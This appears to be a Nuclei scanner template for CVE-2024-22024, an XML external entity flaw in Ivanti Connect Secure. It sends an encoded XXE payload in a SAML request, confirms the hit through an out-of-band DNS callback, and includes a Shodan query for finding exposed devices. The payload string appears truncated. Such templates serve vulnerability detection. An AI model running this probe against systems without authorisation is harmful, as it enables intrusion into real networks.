id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  description: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,xxe,ivanti

variables:
  payload: ' %watchTowr;]>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950